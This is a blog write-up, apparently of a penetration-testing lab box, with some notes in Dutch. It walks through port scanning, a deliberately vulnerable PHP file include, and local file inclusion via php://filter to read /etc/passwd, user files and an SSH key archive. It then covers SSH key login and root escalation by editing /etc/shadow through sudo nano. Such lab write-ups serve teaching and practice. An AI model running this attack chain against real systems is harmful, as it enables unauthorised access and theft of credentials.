ptd-silence-private

.

.

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 13 Jun 12 2020 test
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.66.66.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2021-02-17T08:57:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]

.

 

┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0) 
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050) 
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918) 
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918) 

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php 
<?php

include($_GET['page']);

?>

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST –data “file=browser.php” 10.150.150.55/info.php

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

trick.php?page=index.html

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php

En in die source vind je dan:
index.php?path=/

=> http://10.150.150.55/index.php?path=/

http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz

curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz’ | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user 138 Feb 17 10:55 .
drwxr-xr-x 1 user user 2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user 13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done

En dan zelfde voor andere users (gary, sally en alice)
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done

curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt’ | base64 -d > FLAG79.txt

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano

$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password: 
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#

root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *